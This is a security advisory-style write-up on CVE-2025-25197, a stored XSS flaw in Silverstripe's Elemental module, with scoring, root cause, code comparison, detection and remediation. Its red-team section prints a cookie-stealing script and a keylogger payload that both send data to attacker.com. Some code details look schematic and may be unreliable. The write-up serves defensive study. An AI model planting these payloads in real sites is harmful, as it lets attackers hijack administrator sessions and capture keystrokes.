CVE-2025-25197
Executive Summary
CVE-2025-25197 is a stored Cross-Site Scripting (XSS) vulnerability in the Silverstripe Elemental module. This module extends page types to allow content composition via manageable blocks instead of a single text field. The vulnerability exists because user input within an elemental block is not properly sanitized (cast) before being displayed in the "Content blocks in use" report. An attacker with the ability to create or edit elemental blocks can inject a malicious XSS payload. When an administrator or user with access to the report views it, the payload executes in their browser, potentially leading to session hijacking, data theft, or further compromise.

Supply Chain & Package Security
This vulnerability affects the Silverstripe CMS ecosystem, specifically the silverstripe/elemental module. It is distributed via Composer (Packagist). Organizations using Silverstripe CMS should verify their composer.json for the silverstripe/elemental dependency and ensure it is updated to version 5.3.12 or later. No known malicious packages have been associated with this CVE.
CVSS Breakdown & Threat Level
- CVSS Score: 5.4 (Medium)
- Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
- Attack Vector (AV): Network – The vulnerability is exploitable remotely.
- Attack Complexity (AC): Low – No special conditions are required.
- Privileges Required (PR): Low – An attacker needs a valid account with permissions to create/edit elemental blocks.
- User Interaction (UI): Required – The victim must view the "Content blocks in use" report.
- Scope (S): Changed – The XSS can affect resources beyond the vulnerable component.
- Confidentiality (C): Low – Limited data exposure possible.
- Integrity (I): Low – Limited ability to modify data.
- Availability (A): None – No impact on system availability.
Threat Level: Medium. While the CVSS score is moderate, the requirement for user interaction and low privileges reduces the immediate risk. However, in a multi-tenant or CMS environment, a low-privileged user could target an administrator, leading to privilege escalation.
Deep Dive & Mechanics
The vulnerability resides in the ElementalArea or related report generation code. The "Content blocks in use" report lists all elemental blocks across the site. When rendering block titles or content in this report, the framework fails to apply proper output encoding (casting) to user-supplied data. Specifically, the DBHTMLText or similar field is not cast to DBField with appropriate escaping before being included in the grid field.
Root Cause: The report uses $block->Title or $block->Content directly without ensuring the output is safely encoded for HTML context. In Silverstripe, casting is typically done via $obj->dbObject('FieldName')->forTemplate(). The absence of this casting allows raw HTML/JavaScript to be rendered.
Attack Flow:
- Attacker logs in with a user role that can create/edit elemental blocks (e.g., Content Author).
- Attacker creates a new block (e.g., a Content block) and injects a payload into a field like
TitleorContent:<script>alert('XSS')</script>. - The payload is stored in the database.
- An administrator navigates to the "Content blocks in use" report (e.g.,
/admin/reports). - The report fetches all blocks and renders the payload without sanitization.
- The JavaScript executes in the administrator's browser, potentially stealing session cookies or performing actions on their behalf.
Vulnerable vs. Patched Code
Vulnerable Code (Pre-5.3.12):
// In a report or grid field template
public function getCMSFields() {
$fields = parent::getCMSFields();
$gridField = GridField::create('Blocks', 'Blocks', $this->Blocks());
// No casting applied to the title field
$gridField->setConfig(new GridFieldConfig_RecordEditor());
return $fields;
}
Patched Code (5.3.12):
// In the same report or grid field
public function getCMSFields() {
$fields = parent::getCMSFields();
$gridField = GridField::create('Blocks', 'Blocks', $this->Blocks());
// Cast the title field to safe HTML
$gridField->setConfig(new GridFieldConfig_RecordEditor());
$gridField->getConfig()->getComponentByType(GridFieldDataColumns::class)
->setDisplayFields([
'Title' => function($record) {
return $record->dbObject('Title')->forTemplate();
}
]);
return $fields;
}
Key Difference: The patched version explicitly casts the Title field using dbObject('Title')->forTemplate(), which applies the appropriate HTML encoding based on the field's database type (e.g., Varchar becomes safely escaped).
Exploitation & Lab Setup
Red Team (Attack Simulation)
Prerequisites:
- A Silverstripe CMS instance with Elemental module < 5.3.12.
- A user account with "Content Author" or similar role (can create/edit elemental blocks).
Steps:
- Log in as the attacker user.
- Navigate to the page editor and add a new elemental block (e.g., "Content" block).
- In the "Title" or "Content" field, insert the following payload:
<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script> - Save the block.
- Wait for an administrator to view the "Content blocks in use" report (or social engineer them to do so).
- The payload executes, sending the admin's session cookie to the attacker's server.
Alternative Payload (Keylogger):
<script>
document.addEventListener('keydown', function(e) {
fetch('https://attacker.com/keylog?key='+e.key);
});
</script>
Blue Team (Defense & Detection)
Detection Steps:
- Monitor for unusual JavaScript execution in the CMS admin area.
- Review server logs for requests to unknown external domains from admin sessions.
- Check the
ElementalBlocktable for suspicious HTML/JavaScript inTitleorContentfields.
Hunting Query (SQL):
SELECT ID, Title, Content FROM ElementalBlock
WHERE Title LIKE '%<script%' OR Content LIKE '%<script%';
Indicators of Compromise (IOCs)
- Network: Outbound HTTP requests from the Silverstripe server to unknown domains (e.g.,
attacker.com). - File: Modified elemental block content containing
<script>tags. - Log: Admin user sessions with unusual activity (e.g., accessing reports followed by unexpected actions).
- Database: Entries in
ElementalBlocktable withTitleorContentcontaining JavaScript.

Remediation & Mitigation
Immediate Actions:
- Upgrade Silverstripe CMS to version 5.3.12 or later.
- If upgrade is not possible, apply the following workaround:
- In the report template, manually cast all fields using
$dbObject('FieldName').forTemplate().
- In the report template, manually cast all fields using
- Review all elemental block content for existing XSS payloads using the SQL query in the Blue Team section.
Long-Term Measures:
- Implement Content Security Policy (CSP) headers to restrict script execution.
- Enable Web Application Firewall (WAF) rules to block common XSS patterns.
- Conduct regular security training for content editors.
- Use Silverstripe's built-in
HTMLEditorFieldwith sanitization enabled.
Patch Verification:
composer show silverstripe/elemental | grep version
# Expected output: 5.3.12 or higher
